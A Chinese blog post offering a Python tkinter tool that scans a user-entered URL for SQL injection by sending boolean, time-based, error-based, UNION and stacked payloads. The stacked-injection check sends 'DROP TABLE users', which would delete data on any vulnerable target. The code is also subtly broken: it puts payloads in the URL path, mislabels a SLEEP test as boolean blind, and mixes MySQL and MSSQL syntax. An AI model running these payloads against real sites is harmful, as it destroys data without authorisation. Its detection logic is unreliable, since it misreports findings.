一个简单的sql注入漏洞检测工具

最新推荐文章于 2024-05-09 09:11:23 发布
最新推荐文章于 2024-05-09 09:11:23 发布
阅读量838 收藏 5
点赞数 4
分类专栏: 网络对抗 文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63002183/article/details/133691302
版权

这是一个SQL注入漏洞检测工具,使用了Python的tkinter库创建了一个图形化界面。用户在界面中输入目标URL,然后点击"开始扫描"按钮来检测是否存在SQL注入漏洞。

定义了几个函数来检测不同类型的SQL注入漏洞,包括布尔盲注、时间盲注、报错注入、UNION联合查询注入和堆叠注入。这些函数向目标URL发送特定的payload,并根据响应结果判断是否存在漏洞。

检测过程通过创建一个ScanThread线程来执行,这样可以避免阻塞主界面。在线程中,依次调用各个漏洞检测函数,并将检测结果保存到vulnerabilities列表中。同时,更新进度条的值以显示检测进度。

检测完成后,停止进度条的动画,重新启用"开始扫描"按钮,并通过messagebox弹窗展示检测结果。如果未发现SQL注入漏洞,则弹窗显示"未发现SQL注入漏洞";如果存在漏洞,则弹窗显示具体的漏洞类型。

整个程序的界面由两个部分组成:URL输入框和按钮进度条。用户在URL输入框中输入目标URL,然后点击"开始扫描"按钮来触发漏洞检测。进度条会显示检测的进度。

代码:

import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
import requests
import threading

# 检测布尔盲注漏洞
def check_boolean_blind_injection(url):
    payload = "1' AND SLEEP(5) -- -"
    test_url = f"{url}/{payload}"
    response = requests.get(test_url)
    if response.elapsed.total_seconds() >= 5:
        return "存在布尔盲注漏洞"
    else:
        return ""

# 检测时间盲注漏洞
def check_time_blind_injection(url):
    payload = "1' AND (SELECT COUNT(*) FROM sysobjects WHERE xtype = 'U') > 0; WAITFOR DELAY '0:0:5' -- -"
    test_url = f"{url}/{payload}"
    response = requests.get(test_url)
    if response.elapsed.total_seconds() >= 5:
        return "存在时间盲注漏洞"
    else:
        return ""

# 检测报错注入漏洞
def check_error_based_injection(url):
    payload = "1' AND (SELECT CONVERT(INT, CHAR(65))) -- -"
    test_url = f"{url}/{payload}"
    response = requests.get(test_url)
    if "Conversion failed" in response.text:
        return "存在报错注入漏洞"
    else:
        return ""

# 检测UNION联合查询注入漏洞
def check_union_based_injection(url):
    payload = "1' UNION SELECT 1,2,3 -- -"
    test_url = f"{url}/{payload}"
    response = requests.get(test_url)
    if "1,2,3" in response.text:
        return "存在UNION联合查询注入漏洞"
    else:
        return ""

# 检测堆叠注入漏洞
def check_stack_based_injection(url):
    payload = "1'; DROP TABLE users; -- -"
    test_url = f"{url}/{payload}"
    response = requests.get(test_url)
    # 检测表是否被删除
    payload = "SELECT COUNT(*) FROM sysobjects WHERE xtype = 'U'"
    test_url = f"{url}/{payload}"
    response = requests.get(test_url)
    if "users" not in response.text:
        return "存在堆叠注入漏洞"
    else:
        return ""

# 扫描线程
class ScanThread(threading.Thread):
    def __init__(self, url):
        threading.Thread.__init__(self)
        self.url = url

    def run(self):
        vulnerabilities = []
        num_vulnerabilities = 0

        result_boolean_blind = check_boolean_blind_injection(self.url)
        if result_boolean_blind:
            vulnerabilities.append(result_boolean_blind)
            num_vulnerabilities += 1
            progress_bar["value"] = (num_vulnerabilities/5) * 100

        result_time_blind = check_time_blind_injection(self.url)
        if result_time_blind:
            vulnerabilities.append(result_time_blind)
            num_vulnerabilities += 1
            progress_bar["value"] = (num_vulnerabilities/5) * 100

        result_error_based = check_error_based_injection(self.url)
        if result_error_based:
            vulnerabilities.append(result_error_based)
            num_vulnerabilities += 1
            progress_bar["value"] = (num_vulnerabilities/5) * 100

        result_union_based = check_union_based_injection(self.url)
        if result_union_based:
            vulnerabilities.append(result_union_based)
            num_vulnerabilities += 1
            progress_bar["value"] = (num_vulnerabilities/5) * 100

        result_stack_based = check_stack_based_injection(self.url)
        if result_stack_based:
            vulnerabilities.append(result_stack_based)
            num_vulnerabilities += 1
            progress_bar["value"] = (num_vulnerabilities/5) * 100

        progress_bar.stop()
        btn_detect.config(state=tk.NORMAL)
        if not vulnerabilities:
            messagebox.showinfo("提示", "未发现SQL注入漏洞")
        else:
            messagebox.showwarning("警告", "\n".join(vulnerabilities))

# 检测所有类型的SQL注入漏洞
def detect_vulnerabilities():
    global progress_bar
    url = entry_url.get()
    if not url:
        messagebox.showerror("错误", "请输入URL")
        return

    # 隐藏开始扫描按钮,显示进度条
    btn_detect.config(state=tk.DISABLED)
    progress_bar["value"] = 0
    progress_bar.start()

    # 开启一个线程来执行检测
    thread = ScanThread(url)
    thread.start()

# 创建窗口
window = tk.Tk()
window.title("SQL注入漏洞检测")
window.geometry("400x200")

# URL输入框
label_url = tk.Label(window, text="URL:")
label_url.pack()
entry_url = tk.Entry(window, width=40)
entry_url.pack()

# 检测按钮和进度条
frame_progress = tk.Frame(window)
frame_progress.pack(pady=10)
btn_detect = tk.Button(frame_progress, text="开始扫描", command=detect_vulnerabilities)
btn_detect.pack(side=tk.LEFT)
progress_bar = ttk.Progressbar(frame_progress, mode="determinate", length=200)
progress_bar.pack(side=tk.LEFT, padx=10)

# 运行窗口
window.mainloop()

运行截图如下:

输入目标网站的url后,点击“开始扫描”:

说明目标网站存在堆叠注入漏洞。

请注意,这段代码只是一个简单的示例,可以根据实际需要进行修改和扩展。在实际使用中,建议对目标URL进行合法性验证、异常处理等操作,以提高程序的健壮性和安全性。

与大家共勉。

七月初七淮水竹亭~
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Python自动化SQL注入和数据库取证工具库之sqlmap使用详解
Rocky006的博客
05-14 869
概要 在网络安全领域,SQL注入仍然是最常见的攻击之一。sqlmap是一个开源的自动化SQL注入和数据库取证工具,它提供了广泛的功能来检测和利用SQL注入漏洞。本文将详细介绍sqlmap的安装、特性、基本与高级功能,并结合实际应用场景,展示其在网络安全测试中的应用。
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
最受欢迎的十款SQL注入工具
2301_77472496的博客
08-28 4641
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~《网络安全入门+进阶学习资源包》CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享网络安全源码合集+工具包​​。
10 个 SQL 注入工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
05-09 2012
其主要的目标是在存在着漏洞的数据库服务器上提供一个远程的外壳,甚至在一个有着严格的防范措施的环境中也能如此。Havij不仅能够自动挖掘可利用的SQL 查询,还能够识别后台数据库类型、检索数据的用户名和密码hash、转储表和列、从数据库中提取数据,甚至访问底层文件系统和执行系统命令,当然前提是有 一个可利用的SQL注入漏洞。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞工具SQLmap、NMAP、BP、MSF…
【网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具
m0_67844671的博客
10-03 2284
本篇文章详细介绍了sqlmap工具和使用,如何用sqlmap进行自动化的SQL注入,还讲解了穿山甲,萝卜头等自动化SQL注入工具
SQLiDetector:一款功能强大的SQL注入漏洞检测工具
u010291330的博客
03-25 1922
SQLiDetector是一款功能强大的SQL注入漏洞检测工具,该工具支持BurpBouty配置文件,可以帮助广大研究人员通过发送多个请求(包含14种Payload)并检查不同数据库的152个正则表达式模式来检测基于错误的SQL注入漏洞。我们还创建了一个BurpBounty配置文件,它会使用相同Payload并在不同的位置注入,例如:参数名、参数值、Header和路径。3、使用你的链接和URL工具获取所有的waybackurl,如waybackurl、gau、gauplus等;1、运行子域名搜索工具
sql 注入代码扫描工具
zengliguang的专栏
04-27 544
使用这些SQL注入代码扫描工具,可以帮助开发团队在开发阶段早期发现并修复SQL注入漏洞,提升应用程序的整体安全水平。: OWASP ZAP是一款开源的DAST工具,能够自动或半自动地对运行中的Web应用程序进行安全测试,包括检测SQL注入漏洞。它包含专门针对SQL注入的规则集,能够准确识别出代码中可能导致SQL注入的不安全字符串拼接、不安全的查询构造等模式。它能够深入理解代码逻辑,检测出潜在的SQL注入风险,并提供上下文丰富的报告,便于开发者定位和修复问题。
拿到一个网站,怎么判断该网站是否存在sql注入漏洞
2201_76002918的博客
03-07 3336
漏洞挖掘 漏洞利用 修复漏洞 sql注入漏洞、文件操作漏洞、xss、rce、逻辑漏洞 反序列化、、、、 sql注入漏洞: 网站的数据库 脱裤 拖取网站数据库 数据库基础: 数据库基本结构:数据库 -- 数据表 -- 数据列 -- 数据 sql语句:select * from 数据表的名称 where 数据列的名称=1 web基础: https://www.aaa.com/index.php?id=1 url:统一资源定位符 域名:www.aaa.com ?id=1
基于爬虫的sql注入漏洞检测工具
05-16
本项目“基于爬虫的sql注入漏洞检测工具”旨在自动化检测这种漏洞,保护网站免受此类攻击。 首先,我们来深入理解SQL注入。当一个Web应用没有对用户输入进行充分的验证和清理,它可能会在构建动态SQL查询时直接使用...
Web安全 SQL注入漏洞测试
qq_73710216的博客
04-23 845
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。第一步:进入可能存在SQL注入的页面,先把前面的语句闭合,再使用 order by 测试字段数有多少.(如果指定的列不存在,数据库会报错,通过报错判断查询结果的列数,从而确定主查询的字段数.)(再使用 # 注释掉后面的)
sql注入
qq_51862881的博客
03-02 1056
sql注入的一些基本方式
PHP 小心urldecode引发的SQL注入漏洞
01-20
Ihipop 学校的 Discuz X1.5 论坛被黑,在那里吵了一个下午。Google 一下“Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit”,你就知道。 Discuz 是国内很流行的论坛系统,被黑的网站应该会很多吧。不过我对入侵别人的网站不感兴趣,同时也鄙视那些代码都不会写只会使用别人放出的工具攻击的所谓的“黑客”。 粗略看了一下代码,这个 SQL 注入漏洞是 urldecode 函数造成的。在 PHP 手册中,urldecode 函数下面有一个警告: The superglobals $_GET and $_REQ
漏洞复现-金和OA GetAttOut接口SQL注入漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-14 824
漏洞复现-金和OA GetAttOut接口SQL注入漏洞,附带自己写的poc脚本
10个SQL注入工具
paoling2010的专栏
09-14 2247
众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。以下罗列的10款SQL工具可帮助管理员及时检测存在的漏洞。 BSQL Hacker BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望能对任何的数据库进行SQL溢出注入。 BSQL Ha
SQL注入漏洞扫描---sqlmap
嘿嘿嘿
05-03 2337
数据库--数据表---字段---字段内容一站式识别
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
全村的希望
11-25 1238
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 8082
SQL 注入 SQL注入就是通过把 SQL 命令插入到 Web表单提交 或 输入域名 或 页面URL请求查询的字符串,最终达到欺骗服务器执行恶意的 SQL命令,假如管理员没有对 id 参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询。 sqlmap sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据
【PyHacker编写指南】Sql注入脚本编写
XunanSec的博客
05-15 2294
这节课是巡安似海PyHacker编写指南的《Sql注入脚本编写》有些注入点sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编写脚本来注入了。文末,涉及了sqlmap tamper编写,所以需要一定的python基础才能看懂。喜欢用Python写脚本的小伙伴可以跟着一起写一写。
python实现一个sql注入漏洞检测工具
04-24
可以使用Python中的一些模块和库来实现一个SQL注入漏洞检测工具。具体步骤如下: 1. 编写一个程序从用户输入中获取SQL查询,这个程序需要能够处理输入的字符串,并将其转换为SQL查询。 2. 使用SQLAlchemy模块将SQL查询发送到数据库中执行,并捕获任何SQL错误,这些错误可能是由注入攻击造成的。 3. 对发送的SQL查询进行分析,查找可能存在注入攻击的特征。这些特征可能包括单引号、分号等。 4. 根据发现的特征可以进行进一步的限制,比如控制输入的字符长度、限制相关的字符等。 5. 最后,将发现的漏洞输出到终端或者写入日志文件中。 需要指出的是,虽然以上步骤可以帮助我们检测SQL注入漏洞,但也有可能出现误报或漏洞未被检测的情况。因此,除了使用检测工具之外,我们还需要注意编写安全性更高的代码,使用参数化查询等方法来防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

七月初七淮水竹亭~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值